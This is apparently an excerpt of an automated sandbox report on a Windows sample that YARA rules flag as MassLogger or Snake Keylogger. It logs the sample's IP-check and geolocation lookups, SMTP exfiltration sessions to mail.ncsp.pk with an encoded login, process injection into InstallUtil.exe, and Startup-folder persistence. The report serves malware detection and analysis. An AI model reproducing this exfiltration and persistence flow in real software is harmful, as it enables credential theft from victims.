                                                                            Mar 11, 2025 04:12:03.460607052 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.565742016 CET58749701209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:12:03.614265919 CET49701587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:12:36.786530972 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:12:36.792625904 CET8049692132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:12:36.792682886 CET4969280192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:12:52.302093983 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:12:52.307341099 CET8049697132.226.8.169192.168.2.6
                                                                            Mar 11, 2025 04:12:52.307569027 CET4969780192.168.2.6132.226.8.169
                                                                            Mar 11, 2025 04:13:26.802114010 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:13:26.807153940 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:13:27.103971958 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:13:27.104203939 CET58749696209.182.213.250192.168.2.6
                                                                            Mar 11, 2025 04:13:27.104213953 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:13:27.104278088 CET49696587192.168.2.6209.182.213.250
                                                                            Mar 11, 2025 04:13:27.109134912 CET58749696209.182.213.250192.168.2.6

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 11, 2025 04:11:34.112692118 CET5241453192.168.2.61.1.1.1
                                                                            Mar 11, 2025 04:11:34.120985985 CET53524141.1.1.1192.168.2.6
                                                                            Mar 11, 2025 04:11:36.920682907 CET6281553192.168.2.61.1.1.1
                                                                            Mar 11, 2025 04:11:36.929596901 CET53628151.1.1.1192.168.2.6
                                                                            Mar 11, 2025 04:11:46.781217098 CET5849553192.168.2.61.1.1.1
                                                                            Mar 11, 2025 04:11:46.877480030 CET53584951.1.1.1192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 11, 2025 04:11:34.112692118 CET192.168.2.61.1.1.10x6549Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.920682907 CET192.168.2.61.1.1.10x35dfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:46.781217098 CET192.168.2.61.1.1.10x898Standard query (0)mail.ncsp.pkA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:34.120985985 CET1.1.1.1192.168.2.60x6549No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:36.929596901 CET1.1.1.1192.168.2.60x35dfNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                            Mar 11, 2025 04:11:46.877480030 CET1.1.1.1192.168.2.60x898No error (0)mail.ncsp.pk209.182.213.250A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • reallyfreegeoip.org
                                                                            • checkip.dyndns.org

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649692132.226.8.169806996C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 11, 2025 04:11:34.134108067 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Mar 11, 2025 04:11:35.061326981 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:34 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Mar 11, 2025 04:11:35.065959930 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Mar 11, 2025 04:11:36.918642044 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:36 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Mar 11, 2025 04:11:45.019588947 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Mar 11, 2025 04:11:46.765120029 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.649697132.226.8.169807368C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 11, 2025 04:11:48.161407948 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Mar 11, 2025 04:11:50.292490959 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Mar 11, 2025 04:11:50.302694082 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Mar 11, 2025 04:11:51.657275915 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Mar 11, 2025 04:11:59.688185930 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Mar 11, 2025 04:12:02.258959055 CET273INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:12:02 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649694104.21.80.14436996C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 03:11:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2025-03-11 03:11:39 UTC862INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:39 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 61169
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 10:12:10 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eOFO8A6g8r57Mylm6D9Lsp5%2F8hpxniSE8wRBNN%2BorOL9%2B2QxRBq7pJvGj5hB38VCPAj5lWj0%2FlVAQ2PUJJUd%2FXQ3W5ugMUwofrPyPrhmUjQYKHidrIr5lpKS0QagikL%2FKfp9t1TU"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e7dda08a2d0861-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=45109&min_rtt=39983&rtt_var=16139&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=73708&cwnd=252&unsent_bytes=0&cid=67dd5f7857ed60fb&ts=1120&x=0"
                                                                            2025-03-11 03:11:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.649699104.21.80.14437368C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-03-11 03:11:53 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2025-03-11 03:11:54 UTC865INHTTP/1.1 200 OK
                                                                            Date: Tue, 11 Mar 2025 03:11:53 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 61180
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Mon, 10 Mar 2025 10:12:13 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2O1Z%2B1z%2FWys6MhDYHwyTc3locrTzOi%2Fdjj0xjpxeopGwoZ6jx%2FKqRWXf1QWZKXJ3vhZRS9q%2BIY0jkrZLPzrFXqJN%2B5ni4IOy%2FuSfs5DJJp4roWbuh%2FHeXHMZvQZjamIYEEXaT7yC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 91e7ddf94cd1da9f-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=41248&min_rtt=40430&rtt_var=9384&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=101176&cwnd=252&unsent_bytes=0&cid=584f472f18c30457&ts=599&x=0"
                                                                            2025-03-11 03:11:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            SMTP Packets

                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                            Mar 11, 2025 04:11:47.372541904 CET58749696209.182.213.250192.168.2.6220-ecres243.servconfig.com ESMTP Exim 4.98.1 #2 Mon, 10 Mar 2025 23:11:47 -0400
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Mar 11, 2025 04:11:47.372797966 CET49696587192.168.2.6209.182.213.250EHLO 472847
                                                                            Mar 11, 2025 04:11:47.620040894 CET58749696209.182.213.250192.168.2.6250-ecres243.servconfig.com Hello 472847 [8.46.123.189]
                                                                            250-SIZE 52428800
                                                                            250-LIMITS MAILMAX=1000
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-CHUNKING
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Mar 11, 2025 04:11:47.621753931 CET49696587192.168.2.6209.182.213.250AUTH login bWFpQG5jc3AucGs=
                                                                            Mar 11, 2025 04:11:47.721255064 CET58749696209.182.213.250192.168.2.6334 UGFzc3dvcmQ6
                                                                            Mar 11, 2025 04:11:47.828789949 CET58749696209.182.213.250192.168.2.6235 Authentication succeeded
                                                                            Mar 11, 2025 04:11:47.829027891 CET49696587192.168.2.6209.182.213.250MAIL FROM:<mai@ncsp.pk>
                                                                            Mar 11, 2025 04:11:47.928509951 CET58749696209.182.213.250192.168.2.6250 OK
                                                                            Mar 11, 2025 04:11:47.929924965 CET49696587192.168.2.6209.182.213.250RCPT TO:<mai@ncsp.pk>
                                                                            Mar 11, 2025 04:11:48.031462908 CET58749696209.182.213.250192.168.2.6250 Accepted
                                                                            Mar 11, 2025 04:11:48.031651974 CET49696587192.168.2.6209.182.213.250DATA
                                                                            Mar 11, 2025 04:11:48.131032944 CET58749696209.182.213.250192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                            Mar 11, 2025 04:11:48.133725882 CET49696587192.168.2.6209.182.213.250.
                                                                            Mar 11, 2025 04:11:48.244131088 CET58749696209.182.213.250192.168.2.6250 OK id=1trq20-00000005L16-0N1B
                                                                            Mar 11, 2025 04:12:02.785659075 CET58749701209.182.213.250192.168.2.6220-ecres243.servconfig.com ESMTP Exim 4.98.1 #2 Mon, 10 Mar 2025 23:12:02 -0400
                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                            220 and/or bulk e-mail.
                                                                            Mar 11, 2025 04:12:02.815756083 CET49701587192.168.2.6209.182.213.250EHLO 472847
                                                                            Mar 11, 2025 04:12:02.916202068 CET58749701209.182.213.250192.168.2.6250-ecres243.servconfig.com Hello 472847 [8.46.123.189]
                                                                            250-SIZE 52428800
                                                                            250-LIMITS MAILMAX=1000
                                                                            250-8BITMIME
                                                                            250-PIPELINING
                                                                            250-PIPECONNECT
                                                                            250-AUTH PLAIN LOGIN
                                                                            250-CHUNKING
                                                                            250-STARTTLS
                                                                            250 HELP
                                                                            Mar 11, 2025 04:12:02.930749893 CET49701587192.168.2.6209.182.213.250AUTH login bWFpQG5jc3AucGs=
                                                                            Mar 11, 2025 04:12:03.032586098 CET58749701209.182.213.250192.168.2.6334 UGFzc3dvcmQ6
                                                                            Mar 11, 2025 04:12:03.142643929 CET58749701209.182.213.250192.168.2.6235 Authentication succeeded
                                                                            Mar 11, 2025 04:12:03.146120071 CET49701587192.168.2.6209.182.213.250MAIL FROM:<mai@ncsp.pk>
                                                                            Mar 11, 2025 04:12:03.249808073 CET58749701209.182.213.250192.168.2.6250 OK
                                                                            Mar 11, 2025 04:12:03.250032902 CET49701587192.168.2.6209.182.213.250RCPT TO:<mai@ncsp.pk>
                                                                            Mar 11, 2025 04:12:03.351807117 CET58749701209.182.213.250192.168.2.6250 Accepted
                                                                            Mar 11, 2025 04:12:03.354588985 CET49701587192.168.2.6209.182.213.250DATA
                                                                            Mar 11, 2025 04:12:03.454019070 CET58749701209.182.213.250192.168.2.6354 Enter message, ending with "." on a line by itself
                                                                            Mar 11, 2025 04:12:03.454988956 CET49701587192.168.2.6209.182.213.250.
                                                                            Mar 11, 2025 04:12:03.565742016 CET58749701209.182.213.250192.168.2.6250 OK id=1trq2F-00000005LI1-1j2O
                                                                            Mar 11, 2025 04:13:26.802114010 CET49696587192.168.2.6209.182.213.250QUIT
                                                                            Mar 11, 2025 04:13:27.103971958 CET58749696209.182.213.250192.168.2.6221 ecres243.servconfig.com closing connection

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:23:11:31
                                                                            Start date:10/03/2025
                                                                            Path:C:\Users\user\Desktop\TtLlwb3ava.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\TtLlwb3ava.exe"
                                                                            Imagebase:0x490000
                                                                            File size:1'882'112 bytes
                                                                            MD5 hash:1E20CE6BBF686369929E0D191F9607AD
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1246431997.0000000005380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:23:11:32
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                            Imagebase:0x310000
                                                                            File size:42'064 bytes
                                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:9
                                                                            Start time:23:11:45
                                                                            Start date:10/03/2025
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Activator.vbs"
                                                                            Imagebase:0x7ff6c3e00000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:10
                                                                            Start time:23:11:45
                                                                            Start date:10/03/2025
                                                                            Path:C:\Users\user\AppData\Roaming\Activator.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\Activator.exe"
                                                                            Imagebase:0xfd0000
                                                                            File size:1'882'112 bytes
                                                                            MD5 hash:1E20CE6BBF686369929E0D191F9607AD
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
